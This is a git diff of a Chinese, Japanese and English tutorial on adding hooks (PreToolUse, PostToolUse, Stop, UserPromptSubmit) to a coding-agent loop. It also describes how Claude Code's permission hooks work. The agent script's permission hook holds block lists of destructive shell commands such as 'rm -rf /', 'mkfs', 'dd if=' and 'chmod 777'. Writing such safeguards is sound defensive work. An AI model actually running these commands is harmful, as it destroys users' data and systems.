+    # s04: フックがハードコードを代替
+    blocked = trigger_hooks("PreToolUse", block)
+    if blocked:
+        results.append({"type": "tool_result", "tool_use_id": block.id,
+                        "content": str(blocked)})
+        continue
+
+    handler = TOOL_HANDLERS.get(block.name)
+    output = handler(**block.input) if handler else f"Unknown: {block.name}"
+
+    trigger_hooks("PostToolUse", block, output)
+
+    results.append({"type": "tool_result", "tool_use_id": block.id,
+                    "content": output})
+```
+
+4 つのフックが agent cycle の全重要ノードをカバー:入力→実行前→実行後→終了。ループ自体は永遠に綺麗なまま。
+
+---
+
+## s03 からの変更
+
+| コンポーネント | 変更前 (s03) | 変更後 (s04) |
+|--------------|-------------|-------------|
+| 拡張方式 | check_permission() をループ内にハードコード | HOOKS 登録簿 + trigger_hooks() |
+| 新規関数 | — | register_hook, trigger_hooks |
+| フックコールバック | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook |
+| ループ | check_permission() を直接呼び出し | trigger_hooks("PreToolUse", ...) を呼び出し |
+| 終了制御 | なし | trigger_hooks("Stop", ...) が終了を阻止可能 |
+| 入力横取り | なし | trigger_hooks("UserPromptSubmit", ...) がコンテキスト注入可能 |
+
+---
+
+## 試してみよう
+
+```sh
+cd learn-claude-code
+python s04_hooks/code.py
+```
+
+以下のプロンプトを試してみよう:
+
+1. `Read the file README.md`(そのまま通過するはず — フックログを観察)
+2. `Create a file called test.txt`(作成後、PostToolUse が発火するか観察)
+3. `Delete all temporary files in /tmp`(bash + rm で権限フックが発動)
+
+観察のポイント:各ツール実行前に `[HOOK]` ログが表示されるか? 権限が拒否されたとき、フックがブロックしたのか、ループ内のハードコードがブロックしたのか?
+
+---
+
+## 次へ
+
+Agent は安全に操作を実行できるようになった。しかし「まず何をして、次に何をすべきか」を立ち止まって考えたことはあるか? 複雑なタスクを与えたとき、突っ走るのか、まず計画を立てるのか?
+
+→ s05 TodoWrite:Agent に計画ツールを与える。まずリストを作り、それから実行。完了率が倍増する。
+
+## CC ソースコードを深掘り
+
+> 以下は CC ソースコード `toolHooks.ts`(650 行)、`hooks.ts`、`stopHooks.ts`、`coreTypes.ts` の完全分析に基づく。
+
+### 一、Hook イベント:2 つではなく 27 個
+
+教育版のツールフックは PreToolUse と PostToolUse のみ。CC には実際に 27 のフックイベントがある(`coreTypes.ts:25-53`):
+
+| カテゴリ | イベント |
+|----------|---------|
+| ツール関連 | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` |
+| セッション関連 | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` |
+| ユーザー対話 | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` |
+| サブエージェント | `SubagentStart`, `SubagentStop` |
+| 圧縮関連 | `PreCompact`, `PostCompact` |
+| チーム関連 | `TeammateIdle`, `TaskCreated`, `TaskCompleted` |
+| その他 | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` |
+
+教育版は 4 つのコアイベント(UserPromptSubmit、PreToolUse、PostToolUse、Stop)のみを取り上げる。これらで agent cycle の重要ノードを全てカバーできる。残り 23 個は同じパターン。
+
+### 二、HookResult の完全フィールド
+
+CC の `HookResult`(`types/hooks.ts:260-275`)には 13 のフィールドがあり、主要なものは以下の通り:
+
+| フィールド | 型 | 用途 |
+|-----------|-----|------|
+| `message` | Message | オプションの UI メッセージ |
+| `blockingError` | HookBlockingError | ブロッキングエラー → 会話に注入してモデルが自己修正 |
+| `outcome` | success/blocking/non_blocking_error/cancelled | 実行結果 |
+| `preventContinuation` | boolean | 後続実行を阻止 |
+| `stopReason` | string | 停止理由の説明 |
+| `permissionBehavior` | allow/deny/ask/passthrough | フックが権限決定を返す |
+| `updatedInput` | Record | ツール入力の変更 |
+| `additionalContext` | string | 追加コンテキスト |
+| `updatedMCPToolOutput` | unknown | MCP ツール出力の変更 |
+
+### 三、重要な不変条件:Hook 'allow' は deny/ask ルールをバイパスできない
+
+これは CC 権限システムで最も重要なセキュリティ設計(`toolHooks.ts:325-331`):**フックが allow を返しても、settings.json の deny/ask ルールをチェックする。** ユーザーのフックスクリプトが「許可」と言っても、settings.json でそのツールが無効になっていれば、操作は阻止される。
+
+教育版にはこの階層がない — フックが非 None を返せば直接中断。教育目的では十分だが、本番環境ではセキュリティホールになる。
+
+### 四、stopHookActive 機構
+
+CC の Stop フックには無限ループ防止機構がある(`query.ts:212,1300`):`stopHookActive` 状態フィールド。Stop フックが blockingError を発生させると、ループは `stopHookActive: true` で次のラウンドに再入する。後続のイテレーションではこのフラグを見て Stop フックを再トリガーしない。これで「モデルが自己修正 → Stop フックが再度エラー → モデルが再修正 → Stop フックが再度エラー...」という永久に止まらないバグを防ぐ。
+
+### 五、hook_stopped_continuation
+
+PostToolUse フックが `preventContinuation: true` を返すと、`hook_stopped_continuation` アタッチメントが生成される(`toolHooks.ts:117-130`)。query.ts(L1388-1393)はそれを検出して `shouldPreventContinuation = true` を設定し、ループが終了する。これは「フックが Agent を優雅に停止させる」機構 — クラッシュではなく、完了。
+
+### 教育版の簡略化は意図的
+
+- 27 イベント → 4(UserPromptSubmit/PreToolUse/PostToolUse/Stop):agent cycle の重要ノードをカバー
+- 13 フィールド → 単純な戻り値(None = 続行、非 None = PreToolUse では中断・Stop では強制続行):認知負荷を最小限に
+- Hook allow vs deny/ask の不変条件 → 省略:教育版に settings.json 層はない
+- stopHookActive → 省略:教育版の Stop フックは単純な続行のみ、無限ループ防止は不要
+
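参考までに、教育版のループに stopHookActive 相当のフラグを足すとどうなるかの最小スケッチ(CC の実装そのものではなく、フィールド名だけ借りた仮実装):

```python
def run_loop(stop_hook, max_rounds=5):
    """stop_hook が続行を要求しても、その要求は 1 回しか通らない。"""
    stop_hook_active = False
    rounds = 0
    while rounds < max_rounds:
        rounds += 1
        # ...(本来はここで LLM 呼び出しとツール実行)...
        if not stop_hook_active:
            force = stop_hook()          # 非 None = blockingError 相当
            if force is not None:
                stop_hook_active = True  # 以降のイテレーションでは再発火させない
                continue                 # 強制続行は 1 回だけ
        return rounds                    # 正常終了
    return rounds

fired = []

def nagging_stop_hook():
    """常に続行を要求する、行儀の悪い Stop フック。"""
    fired.append(1)
    return "keep going"

print(run_loop(nagging_stop_hook))  # → 2(無限ループにならない)
print(len(fired))                   # → 1(フックは一度だけ発火)
```

フラグが無ければ、このフックは max_rounds まで毎回発火し続ける。フラグ 1 つで「自己修正は許すが、無限連鎖は許さない」という CC の設計意図を再現できる。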
+ + diff --git a/s04_hooks/README.md b/s04_hooks/README.md new file mode 100644 index 000000000..e41bbe047 --- /dev/null +++ b/s04_hooks/README.md @@ -0,0 +1,280 @@ +# s04: Hooks — 挂在循环上,不写进循环里 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"挂在循环上, 不写进循环里"* — 钩子在工具执行前后注入扩展逻辑。 +> +> **Harness 层**: 钩子 — 扩展点不侵入循环。 + +--- + +## 问题 + +s03 的 Agent 有权限检查了。但每次加一个新检查——比如"记录每次 bash 调用"、"操作后自动 git add"——都要修改 `agent_loop` 函数。 + +循环很快就变成了这样: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # 加一行 + check_permission(block) # 加一行 + notify_slack(block) # 又加一行 + output = execute(block) + auto_git_add(block) # 再加一行 + # ... 很快循环就认不出来了 +``` + +你想扩展的是 Agent 的行为,但你改的却是循环本身。循环应该是一个稳定的核心,扩展应该挂在外面。 + +--- + +## 解决方案 + +![Hooks Overview](images/hooks-overview.svg) + +s03 的循环和权限逻辑完全保留。唯一的变动是把 `check_permission()` 从循环体内移到了钩子上——循环不再直接调用任何检查函数,改为 `trigger_hooks("PreToolUse", block)`,由注册表决定跑什么。 + +四个事件,覆盖一个完整的 agent cycle: + +| 事件 | 触发时机 | 典型用途 | +|------|---------|---------| +| UserPromptSubmit | 用户输入提交后、进入 LLM 前 | 输入验证、注入上下文 | +| PreToolUse | 工具执行前 | 权限检查、日志记录 | +| PostToolUse | 工具执行后 | 自动 git add、结果后处理 | +| Stop | 循环即将退出时 | 强制续跑、收尾清理 | + +加一个扩展 = `register_hook()`,循环不改。 + +--- + +## 工作原理 + +**钩子注册表**——一个字典,事件名映射到回调列表: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # 返回值 ≠ None → 钩子说"停" + return result + return None +``` + +**UserPromptSubmit**——用户输入提交后、进入 LLM 前触发。可以注入上下文或拦截输入: + +```python +def context_inject_hook(query: str) -> str | None: + """Inject current working directory info into every prompt.""" + print(f"\033[90m[HOOK] 
UserPromptSubmit: working in {WORKDIR}\033[0m") + return None # return None = no modification, let prompt through + +register_hook("UserPromptSubmit", context_inject_hook) +``` + +在主循环中,用户输入后立即触发: + +```python +query = input("s04 >> ") +trigger_hooks("UserPromptSubmit", query) # ← 进入 LLM 之前 +history.append({"role": "user", "content": query}) +agent_loop(history) +``` + +**PreToolUse / PostToolUse**——工具执行前后的钩子。s03 的权限检查逻辑现在包装成 PreToolUse 钩子,再加一个日志钩子和一个大输出提醒: + +```python +# PreToolUse: 权限检查(s03 的逻辑,从循环移到钩子) +def permission_hook(block): + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + return "Permission denied by deny list" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +# PreToolUse: 日志 +def log_hook(block): + print(f"[HOOK] {block.name}(...)") + +# PostToolUse: 大文件提醒 +def large_output_hook(block, output): + if len(str(output)) > 100000: + print(f"[HOOK] ⚠ Large output from {block.name}") + +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +``` + +**Stop**——循环即将退出时触发(`stop_reason != "tool_use"`)。可以阻止退出、强制续跑,或做收尾清理: + +```python +def summary_hook(messages: list) -> str | None: + """Print a summary when the loop is about to stop.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None # return None = allow stop, return string = force continuation + +register_hook("Stop", summary_hook) +``` + +在 agent_loop 中,退出前触发: + +```python +if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) # 
← 退出之前 + if force: + # hook returned a message → inject it and continue + messages.append({"role": "user", "content": force}) + continue + return +``` + +**循环里只改了一处**——s03 直接调用 `check_permission(block)`,s04 改为 `trigger_hooks("PreToolUse", block)`: + +```python +for block in response.content: + if block.type != "tool_use": + continue + + # s03: if not check_permission(block): ... + # s04: 钩子替代硬编码 + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) +``` + +四个钩子覆盖了 agent cycle 的全部关键节点:输入→执行前→执行后→退出。循环本身永远干净。 + +--- + +## 相对 s03 的变更 + +| 组件 | 之前 (s03) | 之后 (s04) | +|------|-----------|-----------| +| 扩展方式 | check_permission() 硬编码在循环里 | HOOKS 注册表 + trigger_hooks() | +| 新函数 | — | register_hook, trigger_hooks | +| 钩子回调 | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook | +| 循环 | 直接调用 check_permission() | 调用 trigger_hooks("PreToolUse", ...) | +| 退出控制 | 无 | trigger_hooks("Stop", ...) 可阻止退出 | +| 输入拦截 | 无 | trigger_hooks("UserPromptSubmit", ...) 可注入上下文 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s04_hooks/code.py +``` + +试试这些 prompt: + +1. `Read the file README.md`(应该直接通过,观察钩子日志) +2. `Create a file called test.txt`(通过后观察 PostToolUse 是否触发) +3. `Delete all temporary files in /tmp`(bash + rm 触发权限钩子) + +观察重点:每次工具执行前,是否出现了 `[HOOK]` 日志?权限被拒时,是钩子拦截的还是循环里硬编码的? + +--- + +## 接下来 + +Agent 现在能安全执行操作了。但它有没有停下来想过"我应该先做什么,再做什么"?给它一个复杂任务,它是直接莽上去,还是先列个计划? + +s05 TodoWrite → 给 Agent 一个计划工具。先列清单,再做。完成率翻倍。 + +
+## 深入 CC 源码
+
+> 以下基于 CC 源码 `toolHooks.ts`(650 行)、`hooks.ts`、`stopHooks.ts`、`coreTypes.ts` 的完整分析。
+
+### 一、Hook 事件:不是 2 个,是 27 个
+
+教学版的工具钩子只讲了 PreToolUse 和 PostToolUse。CC 实际有 27 个 hook 事件(`coreTypes.ts:25-53`):
+
+| 类别 | 事件 |
+|------|------|
+| 工具相关 | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` |
+| 会话相关 | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` |
+| 用户交互 | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` |
+| 子 Agent | `SubagentStart`, `SubagentStop` |
+| 压缩相关 | `PreCompact`, `PostCompact` |
+| 团队相关 | `TeammateIdle`, `TaskCreated`, `TaskCompleted` |
+| 其他 | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` |
+
+教学版只讲 4 个核心事件(UserPromptSubmit、PreToolUse、PostToolUse、Stop),因为它们覆盖了一个完整 agent cycle 的关键节点。其他 23 个都是同样的模式。
+
+### 二、HookResult 的完整字段
+
+CC 的 `HookResult`(`types/hooks.ts:260-275`)有 13 个字段,核心字段如下:
+
+| 字段 | 类型 | 用途 |
+|------|------|------|
+| `message` | Message | 可选 UI 消息 |
+| `blockingError` | HookBlockingError | 阻塞错误 → 注入对话让模型自纠 |
+| `outcome` | success/blocking/non_blocking_error/cancelled | 执行结果 |
+| `preventContinuation` | boolean | 阻止后续执行 |
+| `stopReason` | string | 停止原因描述 |
+| `permissionBehavior` | allow/deny/ask/passthrough | 钩子返回权限决策 |
+| `updatedInput` | Record | 修改工具输入 |
+| `additionalContext` | string | 附加上下文 |
+| `updatedMCPToolOutput` | unknown | MCP 工具输出修改 |
+
+### 三、关键不变式:Hook 'allow' 不能绕过 deny/ask 规则
+
+这是 CC 权限系统最重要的安全设计(`toolHooks.ts:325-331`):**钩子返回 allow 时,仍然要检查 settings.json 的 deny/ask 规则**。即使用户的钩子脚本说"允许",如果在 settings.json 中禁用了这个工具,操作仍然会被阻止。
+
+教学版没有这个层次——钩子返回非 None 就直接中断。这在教学场景中够了,但在生产环境中会形成安全漏洞。
+
+### 四、stopHookActive 机制
+
+CC 的 Stop hooks 有一个防无限循环机制(`query.ts:212,1300`):`stopHookActive` 状态字段。当 stop hooks 产生 blockingError 时,循环带 `stopHookActive: true` 重入下一轮。后续迭代中 stop hooks 看到这个标志就不会再次触发。这防止了一个永不停机的 bug——模型自纠后 stop hook 再次报错 → 模型再自纠 → stop hook 再报错...
+
+### 五、hook_stopped_continuation
+
+PostToolUse hooks 返回 `preventContinuation: true` 时,会产生一个 `hook_stopped_continuation` 附件(`toolHooks.ts:117-130`)。query.ts(L1388-1393)检测到后设置 `shouldPreventContinuation = true`,循环退出。这是"钩子优雅地让 Agent 停机"的机制——不是崩溃,是完成。
+
+### 教学版的简化是刻意的
+
+- 27 个事件 → 4 个(UserPromptSubmit/PreToolUse/PostToolUse/Stop):覆盖 agent cycle 关键节点
+- 13 个字段 → 简单的返回值(None = 继续;非 None = PreToolUse 拦截、Stop 强制续跑):心智负担降到最低
+- Hook allow vs deny/ask 不变式 → 省略:教学版没有 settings.json 层
+- stopHookActive → 省略:教学版 Stop hook 只做简单续跑,不涉及防无限循环机制
+
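如果想在教学版里补上第三节这条不变式,下面是一个最小示意(settings 结构与函数名都是本文的假设,不是 CC 真实代码):

```python
# 假设的 settings 结构,模拟 settings.json 的 deny 规则(仅为示意)
SETTINGS = {"deny": ["bash(rm -rf*)", "write_file"]}

def settings_denies(tool_name: str) -> bool:
    """简化版:只匹配工具名,忽略括号里的参数模式。"""
    return any(rule.split("(")[0] == tool_name for rule in SETTINGS["deny"])

def resolve_permission(tool_name: str, hook_decision: str) -> str:
    """不变式:即使 hook 返回 allow,也要先过 settings 的 deny 规则。"""
    if settings_denies(tool_name):
        return "deny"                 # settings deny 永远优先
    if hook_decision in ("allow", "deny", "ask"):
        return hook_decision
    return "ask"                      # passthrough 回落到默认策略

print(resolve_permission("write_file", "allow"))  # → deny,hook 绕不过 settings
print(resolve_permission("read_file", "allow"))   # → allow
```

关键在于检查顺序:settings deny 在 hook 决策之前求值,所以用户脚本无论返回什么都无法解禁一个被配置层封死的工具。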
+ + diff --git a/s04_hooks/code.py b/s04_hooks/code.py new file mode 100644 index 000000000..47b5d4386 --- /dev/null +++ b/s04_hooks/code.py @@ -0,0 +1,290 @@ +#!/usr/bin/env python3 +""" +s04: Hooks — move extension logic out of the loop, onto hooks. + + User types query + │ + ▼ + ┌──────────────────┐ + │ UserPromptSubmit │ ── trigger_hooks() before LLM + └────────┬─────────┘ + ▼ + ┌────────────┐ ┌─────────────────────────────┐ + │ messages │────▶│ LLM (stop_reason?) │ + └────────────┘ │ No ──▶ Stop hooks ──▶ exit │ + │ Yes ──▶ tool_use block ──┐ │ + └────────────────────────────┘ │ + ▼ + ┌──────────────────┐ + │ trigger_hooks() │ + │ PreToolUse: │ + │ permission_hook │ + │ log_hook │ + └───────┬──────────┘ + │ (not blocked) + ┌───────▼──────────┐ + │ TOOL_HANDLERS[x] │ + └───────┬──────────┘ + │ + ┌───────▼──────────┐ + │ trigger_hooks() │ + │ PostToolUse: │ + │ large_output │ + └───────┬──────────┘ + │ + results ──▶ back to messages + +Changes from s03: + + HOOKS registry (event -> list of callbacks) + + register_hook() / trigger_hooks() + + context_inject_hook (UserPromptSubmit) + + permission_hook, log_hook (PreToolUse) + + large_output_hook (PostToolUse) + + summary_hook (Stop) + - check_permission() removed from loop body + (logic moved into permission_hook, triggered via PreToolUse) + +Run: python s04_hooks/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) 
+MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s03 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": 
{"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s04: Hook System (s03 permission logic now via hooks) +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # non-None return → abort + return result + return None + + +# s03 permission check logic, now wrapped as a hook +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] +DESTRUCTIVE = ["rm ", "> /etc/", "chmod 777"] + +def permission_hook(block): + """PreToolUse: s03 check_permission() logic moved here.""" + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in 
block.input.get("command", ""):
+                print(f"\n\033[31m⛔ Blocked: '{pattern}'\033[0m")
+                return "Permission denied by deny list"
+        for kw in DESTRUCTIVE:
+            if kw in block.input.get("command", ""):
+                print(f"\n\033[33m⚠ Potentially destructive command\033[0m")
+                print(f"   Tool: {block.name}({block.input})")
+                choice = input("   Allow? [y/N] ").strip().lower()
+                if choice not in ("y", "yes"):
+                    return "Permission denied by user"
+    if block.name in ("write_file", "edit_file"):
+        path = block.input.get("path", "")
+        if not path.startswith(str(WORKDIR)):
+            print(f"\n\033[33m⚠ Writing outside workspace\033[0m")
+            print(f"   Tool: {block.name}({block.input})")
+            choice = input("   Allow? [y/N] ").strip().lower()
+            if choice not in ("y", "yes"):
+                return "Permission denied by user"
+    return None
+
+def log_hook(block):
+    """PreToolUse: log every tool call."""
+    args_preview = str(list(block.input.values())[:2])[:60]
+    print(f"\033[90m[HOOK] {block.name}({args_preview})\033[0m")
+    return None
+
+def large_output_hook(block, output):
+    """PostToolUse: warn on large output."""
+    if len(str(output)) > 100000:
+        print(f"\033[33m[HOOK] ⚠ Large output from {block.name}: {len(str(output))} chars\033[0m")
+    return None
+
+# UserPromptSubmit hook: log the working directory before each prompt reaches the LLM
+def context_inject_hook(query: str):
+    print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m")
+    return None
+
+# Stop hook: print a summary when the loop is about to exit
+def summary_hook(messages: list):
+    tool_count = sum(1 for m in messages
+                     for b in (m.get("content") if isinstance(m.get("content"), list) else [])
+                     if isinstance(b, dict) and b.get("type") == "tool_result")
+    print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m")
+    return None
+
+register_hook("UserPromptSubmit", context_inject_hook)
+register_hook("PreToolUse", permission_hook)
+register_hook("PreToolUse", log_hook)
+register_hook("PostToolUse", large_output_hook)
+register_hook("Stop", summary_hook)
+
+
+# ═══════════════════════════════════════════════════════════ +# agent_loop — same structure as s03, but no hard-coded check +# s03: if not check_permission(block): ... +# s04: if trigger_hooks("PreToolUse", block): ... +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + # s04 change: hook replaces hard-coded check_permission() + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) # s04: post hook + + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s04: Hooks — extension logic on hooks, loop stays clean") + print("Type a question, press Enter. 
Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms04 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s04_hooks/images/hooks-overview.en.svg b/s04_hooks/images/hooks-overview.en.svg new file mode 100644 index 000000000..5fa4995b5 --- /dev/null +++ b/s04_hooks/images/hooks-overview.en.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — Extension Logic Hangs Outside, Loop Unchanged + + + + + + messages[] + (s01 preserved) + + + + + + + LLM + stop_reason? + + + + No + + Return Result + + + + Yes + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + return non-None → block + + + + + Skip Execution + + + + Pass + + + + TOOL_ + HANDLERS + bash/read/... + + + + After exec + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + Results appended to messages[], loop continues + + + + s03: + if not check_permission(block): ... + ← every new check requires modifying the loop + s04: + blocked = trigger_hooks("PreToolUse", block) + ← add check = register_hook(), loop unchanged + diff --git a/s04_hooks/images/hooks-overview.ja.svg b/s04_hooks/images/hooks-overview.ja.svg new file mode 100644 index 000000000..6348c5ba5 --- /dev/null +++ b/s04_hooks/images/hooks-overview.ja.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — 拡張ロジックは外側に、ループは一文字も変更しない + + + + + + messages[] + (s01 保持) + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + 非 None を返す → 中断 + + + + + 実行をスキップ + + + + 通過 + + + + TOOL_ + HANDLERS + bash/read/... 
+ + + + 実行後 + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + 結果を messages[] に追加、ループ継続 + + + + s03: + if not check_permission(block): ... + ← チェックを追加するたびにループを修正 + s04: + blocked = trigger_hooks("PreToolUse", block) + ← チェック追加 = register_hook()、ループ不変 + diff --git a/s04_hooks/images/hooks-overview.svg b/s04_hooks/images/hooks-overview.svg new file mode 100644 index 000000000..6fe7d5f2a --- /dev/null +++ b/s04_hooks/images/hooks-overview.svg @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Hooks — 扩展逻辑挂在外面,循环本身一字不改 + + + + + + messages[] + (s01 保留) + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks() + PreToolUse + + permission_hook · log_hook + 返回非 None → 中断 + + + + + 跳过执行 + + + + 通过 + + + + TOOL_ + HANDLERS + bash/read/... + + + + 执行后 + + + + trigger_hooks() + PostToolUse + + large_output_hook + + + + 结果追加到 messages[],循环继续 + + + + s03: + if not check_permission(block): ... + ← 每加一个检查就要改循环 + s04: + blocked = trigger_hooks("PreToolUse", block) + ← 加检查 = register_hook(),循环不改 + diff --git a/s05_todo_write/README.en.md b/s05_todo_write/README.en.md new file mode 100644 index 000000000..0d41b9924 --- /dev/null +++ b/s05_todo_write/README.en.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — An Agent Without a Plan Drifts Off Course + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"An agent without a plan goes wherever the wind blows"* — List the steps first, then execute. Completion rate doubles. +> +> **Harness Layer**: Planning — Let the Agent think before it acts. + +--- + +## The Problem + +Give the Agent a complex task: "Rename all Python files to snake_case, run tests, and fix failures." + +The Agent starts working — renames 3 files, runs a test, finds 2 failures, starts fixing. While fixing, it forgets the original goal was "rename to snake_case" — the test failures have consumed all its attention. 
